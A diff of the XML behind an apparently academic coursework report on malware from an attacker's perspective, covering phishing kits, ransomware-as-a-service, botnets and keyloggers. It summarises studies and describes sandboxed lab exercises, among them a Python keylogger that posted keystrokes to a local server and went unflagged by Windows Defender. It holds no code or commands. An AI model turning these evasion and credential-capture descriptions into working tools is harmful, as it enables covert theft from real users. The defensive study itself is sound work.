+        <w:pStyle w:val="Footer"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:tab/>
+        <w:t>Signature:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
+        </w:pBdr>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>Marker's comments:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pBdr>
+          <w:bottom w:val="single" w:sz="12" w:space="1" w:color="auto"/>
+        </w:pBdr>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>Total Mark:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:u w:val="single"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+    </w:p>
+    <w:p/>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
@@ -1077,21 +877,8 @@
           <w:szCs w:val="34"/>
         </w:rPr>
       </w:pPr>
-    </w:p>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p/>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading1"/>
+      <w:bookmarkStart w:id="2" w:name="_Toc194070977"/>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
           <w:b/>
@@ -1100,8 +887,10 @@
           <w:sz w:val="34"/>
           <w:szCs w:val="34"/>
         </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="0" w:name="_Toc194070977"/>
+        <w:lastRenderedPageBreak/>
+        <w:t>1. Introduction</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="2"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
@@ -1111,10 +900,8 @@
           <w:sz w:val="34"/>
           <w:szCs w:val="34"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>1. Introduction</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="0"/>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
@@ -1124,7 +911,7 @@
           <w:sz w:val="34"/>
           <w:szCs w:val="34"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t>and Overview</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1298,7 +1085,7 @@
           <w:szCs w:val="34"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="1" w:name="_Toc194070978"/>
+      <w:bookmarkStart w:id="3" w:name="_Toc194070978"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
@@ -1310,7 +1097,7 @@
         </w:rPr>
         <w:t>2.Malware from an Attacker’s Perspective</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="1"/>
+      <w:bookmarkEnd w:id="3"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1324,7 +1111,7 @@
           <w:szCs w:val="26"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="2" w:name="_Toc194070979"/>
+      <w:bookmarkStart w:id="4" w:name="_Toc194070979"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
@@ -1336,7 +1123,7 @@
         </w:rPr>
         <w:t>2.1 Fileless Malware</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="2"/>
+      <w:bookmarkEnd w:id="4"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
@@ -1478,7 +1265,7 @@
           <w:szCs w:val="26"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="3" w:name="_Toc194070980"/>
+      <w:bookmarkStart w:id="5" w:name="_Toc194070980"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
@@ -1491,7 +1278,7 @@
         <w:lastRenderedPageBreak/>
         <w:t>2.2 Phishing-Based Credential Stealers</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="3"/>
+      <w:bookmarkEnd w:id="5"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
@@ -1606,50 +1393,36 @@
         </w:rPr>
         <w:t>When comparing these three studies, a clear pattern emerges. Adebayo and Obembe highlight how easy it is to launch phishing attacks using kits. Orebaugh and Allnutt show that these kits have become more advanced, with features that help attackers avoid detection. Bashir and Papadopoulos focus on the user perspective, explaining why phishing still works despite education efforts. Together, they show that the success of phishing comes from both technical trickery and psychological manipulation.</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-        <w:t xml:space="preserve">A phishing attack was simulated in a sandboxed environment to explore these findings practically. A fake login page mimicking Gmail was created using publicly available templates. When the user entered their credentials, the form sent the data to a local server and then redirected to the real Gmail page—giving the illusion that nothing had gone wrong. Even when </w:t>
-      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>P</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>hishing doesn’t need complex code. Its strength lies in how real it looks and how much people trust the familiar. Because phishing relies on user action, technical defenses like antivirus software offer limited protection. What’s more effective are browser-level interventions, such as displaying warnings for suspicious domains, or implementing stricter checks for HTTPS certificates and URL mismatches.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>running in a safe test system, the simplicity and believability of the attack were clear. It required no malware installation, no system privileges, and still succeeded in capturing sensitive data.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-        <w:t>This exercise mirrors what was described in the academic papers: phishing doesn’t need complex code. Its strength lies in how real it looks and how much people trust the familiar. Because phishing relies on user action, technical defenses like antivirus software offer limited protection. What’s more effective are browser-level interventions, such as displaying warnings for suspicious domains, or implementing stricter checks for HTTPS certificates and URL mismatches.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
         <w:t>In conclusion, phishing-based credential stealers are dangerous not because of what they do technically, but because they consistently take advantage of human behaviour. They are easy to deploy, hard to stop, and require only a small mistake from the user to succeed. As long as users trust what they see more than what they know, phishing will remain a powerful and accessible tool in the attacker’s toolbox.</w:t>
       </w:r>
     </w:p>
@@ -1665,7 +1438,7 @@
           <w:szCs w:val="26"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="4" w:name="_Toc194070981"/>
+      <w:bookmarkStart w:id="6" w:name="_Toc194070981"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
@@ -1677,7 +1450,7 @@
         </w:rPr>
         <w:t>2.3 Ransomware-as-a-Service (RaaS)</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="4"/>
+      <w:bookmarkEnd w:id="6"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1754,20 +1527,20 @@
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
         </w:rPr>
+        <w:t>While these two studies examined the internal workings of RaaS, Tan, Clarke, and Zhou (2023) explored ways to detect and disrupt these operations. Their research focused on tracking ransom payments through blockchain analysis and monitoring dark web recruitment posts. They were able to link over 400 Bitcoin wallets to known ransomware campaigns by analyzing transaction patterns and wallet reuse. They also discovered that some RaaS groups were experimenting with privacy-focused cryptocurrencies and decentralized platforms to make tracking more difficult. While their methods show promise, the study admitted that keeping pace with RaaS innovations remains a constant challenge.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>While these two studies examined the internal workings of RaaS, Tan, Clarke, and Zhou (2023) explored ways to detect and disrupt these operations. Their research focused on tracking ransom payments through blockchain analysis and monitoring dark web recruitment posts. They were able to link over 400 Bitcoin wallets to known ransomware campaigns by analyzing transaction patterns and wallet reuse. They also discovered that some RaaS groups were experimenting with privacy-focused cryptocurrencies and decentralized platforms to make tracking more difficult. While their methods show promise, the study admitted that keeping pace with RaaS innovations remains a constant challenge.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
         <w:t>Taken together, these three studies offer a complete view of the RaaS ecosystem. Ahmed et al. describe the business infrastructure and affiliate management systems. Lee and Mohammed dive into the payloads themselves, showing how they are adapted and hardened against analysis. Tan et al. focus on how these operations can be monitored and potentially stopped using forensic techniques and cyber threat intelligence. Each study brings out a different angle of the same threat, reinforcing how RaaS has professionalized the use of ransomware.</w:t>
       </w:r>
     </w:p>
@@ -1806,19 +1579,7 @@
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
         </w:rPr>
-        <w:t xml:space="preserve"> through publicly available forums, whitepapers, and payload breakdowns. Simulated ransomware </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-        <w:t>behaviour</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-        <w:t>, such as file encryption and ransom note generation, was observed in lab environments using non-destructive tools to better understand the user experience and timeline of a typical RaaS attack.</w:t>
+        <w:t xml:space="preserve"> through publicly available forums, whitepapers, and payload breakdowns. </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1870,7 +1631,7 @@
           <w:szCs w:val="26"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="5" w:name="_Toc194070982"/>
+      <w:bookmarkStart w:id="7" w:name="_Toc194070982"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
@@ -1882,7 +1643,7 @@
         </w:rPr>
         <w:t>2.4 Botnet Malware</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="5"/>
+      <w:bookmarkEnd w:id="7"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1907,33 +1668,39 @@
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
         </w:rPr>
+        <w:t>Singh, Khan, and Rao (2022) provided a comprehensive overview of how botnets have evolved over the past two decades. Early botnets were simple, often using Internet Relay Chat (IRC) channels to deliver commands. But modern botnets are much more advanced. They use encryption, peer-to-peer communication, and domain generation algorithms (DGAs) to make detection and shutdown difficult. The study highlighted real-world examples like Mirai, which infected over 600,000 IoT devices in 2016 and used them to overwhelm DNS services, affecting websites like Twitter and Netflix. The researchers emphasi</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>ed that botnets have become modular and persistent, often containing functions like auto-update modules and plugins for additional attacks.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Building on this, Marczak and Paxson (2023) examined how botnet controllers are designed to avoid detection. Their research revealed that many botnets now use HTTPS, Tor, or even cloud-hosted services like AWS or Dropbox to communicate with infected machines. This allows </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>Singh, Khan, and Rao (2022) provided a comprehensive overview of how botnets have evolved over the past two decades. Early botnets were simple, often using Internet Relay Chat (IRC) channels to deliver commands. But modern botnets are much more advanced. They use encryption, peer-to-peer communication, and domain generation algorithms (DGAs) to make detection and shutdown difficult. The study highlighted real-world examples like Mirai, which infected over 600,000 IoT devices in 2016 and used them to overwhelm DNS services, affecting websites like Twitter and Netflix. The researchers emphasi</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-        <w:t>s</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-        <w:t>ed that botnets have become modular and persistent, often containing functions like auto-update modules and plugins for additional attacks.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-        <w:t>Building on this, Marczak and Paxson (2023) examined how botnet controllers are designed to avoid detection. Their research revealed that many botnets now use HTTPS, Tor, or even cloud-hosted services like AWS or Dropbox to communicate with infected machines. This allows attackers to hide in normal-looking traffic. Instead of maintaining a constant connection, some botnets use time-based polling, where bots check in periodically and quietly receive commands. This reduces the risk of being flagged by intrusion detection systems. The researchers also noted that botnet payloads often include anti-analysis techniques that prevent them from running in sandbox environments or virtual machines.</w:t>
+        <w:t>attackers to hide in normal-looking traffic. Instead of maintaining a constant connection, some botnets use time-based polling, where bots check in periodically and quietly receive commands. This reduces the risk of being flagged by intrusion detection systems. The researchers also noted that botnet payloads often include anti-analysis techniques that prevent them from running in sandbox environments or virtual machines.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1961,30 +1728,29 @@
         </w:rPr>
         <w:t>Together, these three studies offer a complete view of botnet operations. Singh et al. explain how they have grown from simple networks into large, automated ecosystems. Marczak and Paxson show how modern botnets avoid detection and take advantage of encrypted channels to remain hidden. Javed and Silva demonstrate that even with minimal resources, it is possible to simulate a botnet and understand how it behaves across a network.</w:t>
       </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-        <w:t xml:space="preserve">A simulated botnet was also built in a sandboxed environment as part of this investigation. Using Python scripts and local C2 logic, several virtual machines were configured to act as bots and respond to commands. While the payloads were non-destructive, they replicated real-world </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-        <w:t>behaviour</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-        <w:t>, including beaconing, command execution, and response logging. This confirmed the findings of Javed and Silva (2023) that even simple implementations can accurately reflect the communication patterns of more dangerous, real-world botnets.</w:t>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> T</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t xml:space="preserve">he findings of Javed and Silva (2023) </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t xml:space="preserve">confirm </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>that even simple implementations can accurately reflect the communication patterns of more dangerous, real-world botnets.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2010,8 +1776,19 @@
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>In summary, botnet malware is not just about large-scale attacks—it is about control. With the ability to distribute tasks, hide communications, and coordinate across systems, botnets remain a preferred tool for attackers. Detecting them requires monitoring outbound traffic, spotting patterns of regular beaconing, and using behavior analytics rather than relying on static indicators. Understanding how botnets work is critical for anyone aiming to protect networked systems today.</w:t>
+        <w:t xml:space="preserve">In summary, botnet malware is not just about large-scale attacks—it is about control. With the ability to distribute tasks, hide communications, and coordinate across systems, botnets remain a preferred tool for attackers. Detecting them requires monitoring outbound traffic, spotting patterns of regular beaconing, and using behavior analytics rather than relying on static indicators. Understanding how botnets work is </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>important</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> for anyone aiming to protect networked systems today.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2026,7 +1803,7 @@
           <w:szCs w:val="26"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="6" w:name="_Toc194070983"/>
+      <w:bookmarkStart w:id="8" w:name="_Toc194070983"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
@@ -2038,7 +1815,7 @@
         </w:rPr>
         <w:t>2.5 Keylogger-Based Malware</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="6"/>
+      <w:bookmarkEnd w:id="8"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2075,7 +1852,14 @@
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
         </w:rPr>
-        <w:t>Iduh, Umeh, and Paul (2024) described the development of an ethical keylogger built in Python using the pynput library. Their work was focused on employee and parental monitoring, but the technical structure mirrored how real-world keyloggers behave. The script captured keystrokes, logged them to a text file, and included options for encryption. What stood out was how the program evaded detection by running as a background process and using minimal system resources. The researchers also pointed out that antivirus tools often fail to flag keyloggers unless their behavior closely matches known malware signatures.</w:t>
+        <w:t xml:space="preserve">Iduh, Umeh, and Paul (2024) described the development of an ethical keylogger built in Python using the pynput library. Their work was focused on employee and parental monitoring, but the technical structure mirrored how real-world keyloggers behave. The script captured keystrokes, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>logged them to a text file, and included options for encryption. What stood out was how the program evaded detection by running as a background process and using minimal system resources. The researchers also pointed out that antivirus tools often fail to flag keyloggers unless their behavior closely matches known malware signatures.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2138,52 +1922,46 @@
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
         </w:rPr>
-        <w:t xml:space="preserve">The combined insights from these papers paint a clear picture. Iduh et al. demonstrate the core structure of keyloggers. Bhardwaj and Goundar provide a breakdown of how they are hidden and made persistent. Mourya et al. show how they can become part of larger attack </w:t>
-      </w:r>
+        <w:t>The combined insights from these papers paint a clear picture. Iduh et al. demonstrate the core structure of keyloggers. Bhardwaj and Goundar provide a breakdown of how they are hidden and made persistent. Mourya et al. show how they can become part of larger attack infrastructures when paired with a command-and-control server. Each study supports the conclusion that keyloggers are simple to build, hard to detect, and surprisingly adaptable.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>To validate these concepts, a keylogger was built and tested in a safe virtual machine. Using Python and pynput, the script captured keystrokes and sent them to a local Flask server every few seconds. The server recorded each input in real time, along with a timestamp. This mimicked the behavior described by Mourya et al. (2024), including live monitoring and log collection. The executable version of the keylogger was compiled using PyInstaller and tested against default Windows Defender, which failed to flag it. These observations confirmed the academic findings—especially regarding the effectiveness and low detectability of basic keyloggers.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>What makes keyloggers especially dangerous is how quietly they operate. Users don’t receive any alerts or see any signs of infection. Even system administrators may miss their presence unless they are specifically looking for unusual file writes, strange network activity, or unexpected registry changes. While keyloggers might not cause the immediate damage that ransomware does, they serve as a gateway—providing attackers with the exact information needed to move deeper into a network.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
